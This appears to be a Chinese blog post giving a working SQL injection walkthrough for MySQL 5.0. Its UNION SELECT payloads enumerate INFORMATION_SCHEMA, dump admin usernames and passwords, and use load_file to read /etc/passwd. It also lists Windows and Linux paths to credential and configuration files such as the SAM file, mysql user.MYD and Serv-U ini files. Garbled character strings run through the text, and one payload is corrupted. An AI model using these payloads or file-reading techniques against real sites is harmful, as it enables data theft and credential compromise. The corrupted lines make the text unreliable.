mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
- [0 W/ E, d* R! Q


# V0 b0 n4 U8 mMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
  ?, q; g# @* k7 f" S7 _明。
8 w6 S1 F. W4 w; P, `1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

( ?% A$ U; a! K|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
5 G% Z* K: O1 j* F3 @/ x|—字段：TABLE_NAME ->存储表的表名

- a! X: P/ [# M7 l; {! J4 U|COLUMNS ->存储的字段名表
7 H3 b7 D% N0 h; S! H9 N# s7 _! z+ T|—字段：TABLE_SCHEMA ->该字段所属数据库名
6 [4 p. X1 B5 Y' k* w# x- Y|—字段：TABLE_NAME ->存储所属表的名称
2 p! d8 ~0 B6 @. o
9 d% O- n& x% R& Y  ^: l* p( m( {|—字段：COLUMN_NAME ->该字段的名称
9 o7 C. {# W1 c6 n
#########################################################################
##

0×001 获取系统信息:
6 L) g$ Z# ]" }+ N1 U* ]3 o
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
& q9 h3 [6 x1 e( ^+ n$ B(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
+ m& A8 U+ P/ b$ y. h5 R( ]
/*
, J1 g& N! ^& S* D
@@global.version_compile_os 获取系统版本

* f' r8 D  h: ~! ~  F: j( E- z@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
$ d; r" @  _1 \
* n9 Q& G% k2 n' D, J*/

######################################################################

' G3 H+ r& X  r0×002 获取表名
* s3 z2 ?* n' c0 e* i1 Q
  u2 v9 i0 ^: b( Y+ ]" X  o/ o, munion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
$ `9 x, q8 _9 T  l# H
$ s& y, j# m2 G& r# V6 o/*

0x67617264656e 为当前数据库名
# E& E# f$ u$ V$ A1 c
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/
9 A( v/ S. V) J  [- c' X0 y7 j0 q
0 V: T) z& r  d! f7 t3 Q( N7 C# D######################################################################

- X  u0 T* X" P0 q0×003 获取字段
+ Z) v" j) q, d- R. n0 G3 c5 h2 k' [) B
5 d. N; G' R- z& L- E9 \union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
5 M3 Z5 `3 g/ L5 i9 v9 Hinformation_schema.columns where table_name=0x61646d696e and
8 i+ }: Q, @. |& q9 p# c
  K$ e0 P  s5 {9 g: c
' U9 \5 z2 K! B, U/ w3 Dtable_schema=0x67617264656e limit 1 /*

/*

# ^* a1 [! R2 ]( g# ?- s' k0 Ugroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

1 c7 W9 e2 z; Q$ I( P) y0x61646d696e ->选择一个表
* g: f! z3 @# ?) L# S( c( ^* r
0x67617264656e ->数据库名

*/

, J; W- }) _; n' s#####################################################################
+ |  u1 Y( G+ V3 d6 d5 a. o
0×004 获取数据
" `: _  i0 J* \
1 a3 U5 s6 a: K, J* J: S+ ~union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
1 ~( m7 H8 u7 h8 e6 a$ B5 b
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
' c0 W/ p" M, w7 w/ M" P2 z(adpassword),6,7,8 from admin

5 h( R+ ]# W0 E8 Y* x8 L/*

0 s9 z+ t6 F; x0x3c62723e 换行符号HEX编码
2 g8 V: J; [. U, A
; N4 M# _6 ?% H& {8 f* b3 {7 H) |  Fgroup_concat 同时获得该字段所有数据
7 _! o) i2 I# w: S# B+ o
! q4 w; n% {  v+ D*/


- W5 Q. s$ ?: v0 E" ~

# C$ W+ R1 B1 x, t  W9 r
顺便添加一些mysql注入时非常有用的一些东西

# n3 t1 M/ V6 r9 t简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

" e3 U: Y* M) j5 J9 K4 z1:system_user() 系统用户名
2:user()        用户名
1 z5 n! c  n+ N( I1 Z3:current_user()  当前用户名
4:session_user()连接数据库的用户名
/ |) s$ _/ x; A' @2 F5:database()    数据库名
6:version()     MYSQL数据库版本
0 N  [$ S, L$ I7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
: z' `( [* {* N3 }3 ]5 t9 Q9@basedir    MYSQL 安装路径
3 m4 C( u; L* }- e1 t10@version_compile_os   操作系统  Windows Server 2003,
+ @! N  T' |+ N& N收集的一些路径：
" ~# O2 S. {8 ~WINDOWS下:
2 F" l& P% ], X! V5 ec:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
! x5 @) O/ {# U  M6 l: `c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
: S  }9 D- K8 hc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
5 s& D6 ?  P. U, G1 c* Jc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
: m- H: V& K/ l4 r% y. [c:\Program Files\RhinoSoft.com\ServUDaemon.exe
+ T) H! m( o9 c1 t% i% C5 y* ZC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
. c' P! m% N0 qc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
) y2 T" A. {: k1 J' v6 ~+ h
+ }5 u- m8 o1 m4 i  J2 p
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
: _+ @: ~7 t+ F, X, yd:\APACHE\Apache2\conf\httpd.conf
8 H- X; I1 P! Z7 EC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
3 y0 H  R- b4 P) F8 u) S6 H) q/ XC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
9 S0 j; \/ ^  V  h
LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
: w: `  n: b" i4 X/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
# ^  w; R6 e. D/usr/local/app/php5/lib/php.ini //PHP相关设置
& S3 f, u8 X# ~5 v7 w# V/etc/sysconfig/iptables //从中得到防火墙规则策略
' g( _3 [" C  ?% I4 }: @/etc/httpd/conf/httpd.conf // apache配置文件
0 O8 K9 \: V/ y0 }  e  d) X/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
: Y6 `) K) G9 E6 D( A) Z/etc/issue
9 p; |, O1 E; L" q/etc/issue.net
, q7 a+ N6 D. Z& M- T( n/usr/local/app/php5/lib/php.ini //PHP相关设置
' G+ R# B' ^3 Q7 D/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
1 p1 H: ?9 [0 d7 m+ ]. w  F' x7 x4 K/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
& ]: }+ j3 x" a: C/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
/ u$ A( D' _8 A, y9 ~' D, Kload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
) v/ r" ?" e% Ureplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.